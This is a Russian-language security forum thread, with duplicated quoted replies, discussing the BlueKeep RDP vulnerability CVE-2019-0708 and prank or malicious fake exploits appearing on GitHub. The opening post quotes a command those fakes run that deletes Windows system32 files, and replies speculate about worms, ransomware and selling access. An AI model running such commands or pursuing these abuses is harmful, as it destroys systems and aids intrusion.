• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

CVE-2019-0708

M4357R0

Green Team
24.03.2019
56
65
И так в связи с последней обнаруженной уязвимостью CVE-2019-0708 удаленное выполнение произвольного кода в протоколе RDP (pre-auth). На git обнаружилась целая куча шуток собраных на базе CVE-2012-0002.
При запуске такого кода на выходе имеем:
mshta vbscript:msgbox("you play basketball like caixukun!",64,"K8gege:")(window.close)

или в худшем случае
del /q /f c:\windows\system32\*.*

На одном из форумов идет обсуждение, что будет также, как и с wannacry.
Кто, что думает по этому поводу?
 
И так в связи с последней обнаруженной уязвимостью CVE-2019-0708 удаленное выполнение произвольного кода в протоколе RDP (pre-auth). На git обнаружилась целая куча шуток собраных на базе CVE-2012-0002.
При запуске такого кода на выходе имеем:
mshta vbscript:msgbox("you play basketball like caixukun!",64,"K8gege:")(window.close)

или в худшем случае
del /q /f c:\windows\system32\*.*

На одном из форумов идет обсуждение, что будет также, как и с wannacry.
Кто, что думает по этому поводу?
А сам что думаешь?

1) Я вот думаю это топик превратится в болталку.
2) Как Wannacry не будет. Будут использовать по другому. Этож ск дедиков и загрузок можно сделать ))
3) Хотя мб и как Wannacry будет. Червя напишут. Чтоб валиды в .txt сыпались на доступы. Или все же криптолокер.

+ на банкоматах\терминалах то старые (Embedded) ОС стоят XP\2000. Поэтому патч выпустили.
 
Последнее редактирование:
А сам что думаешь?

1) Я вот думаю это топик превратится в болталку.
2) Как Wannacry не будет. Будут использовать по другому. Этож ск дедиков и загрузок можно сделать ))
3) Хотя мб и как Wannacry будет. Червя напишут. Чтоб валиды в .txt сыпались на доступы. Или все же криптолокер.

+ на банкоматах то старые ОС стоят XP\2000. Поэтому патч выпустили.

1. Так этот топик и создан в разделе свободное общение, как раз для таких вещей.

2, 3. Если вспомнить wannacry, то сплойт был изначально. А с этим rce все сложно.
Во первых нету рабочих POC, или чекеров. Сложно проверить то, что на ютюбчике показано.
Во вторых. По honeypot-ах для rdp в анализаторе нету ни одного подключения по rdp где-бы не подбирали пароль, это говорит о том, что honeypot-ы еще не подвергались pre-auth атаке, или находятся не в ликвидных сетях.

Моё мнение - будет все спокойно, так как основная масса OS это win 8, 8.1, 10. По сервакам это win server 2012 r2. И очень мало всяких xp, win7, vista, server 2008.
 
1. Так этот топик и создан в разделе свободное общение, как раз для таких вещей.

2, 3. Если вспомнить wannacry, то сплойт был изначально. А с этим rce все сложно.
Во первых нету рабочих POC, или чекеров. Сложно проверить то, что на ютюбчике показано.
Во вторых. По honeypot-ах для rdp в анализаторе нету ни одного подключения по rdp где-бы не подбирали пароль, это говорит о том, что honeypot-ы еще не подвергались pre-auth атаке, или находятся не в ликвидных сетях.

Моё мнение - будет все спокойно, так как основная масса OS это win 8, 8.1, 10. По сервакам это win server 2012 r2. И очень мало всяких xp, win7, vista, server 2008.
Poc есть его не разглашают. Чекер Nmap и погнал )

про хонипойты ничего не понял из того, что ты сказал. На бред смахивает.

Имхо: ничего не мало ты просто в шодан не заглядывал)))
 
Последнее редактирование:
29925
 
Going to drop the crash PoC here Friday if there isnt one public already... Maybe the following week, depending on if the vulnerable numbers drop consistently or not.
n1xbyte/CVE-2019-0708
 
 
  • Нравится
Реакции: dream-team777
Мы в соцсетях:

Взломай свой первый сервер и прокачай скилл — Начни игру на HackerLab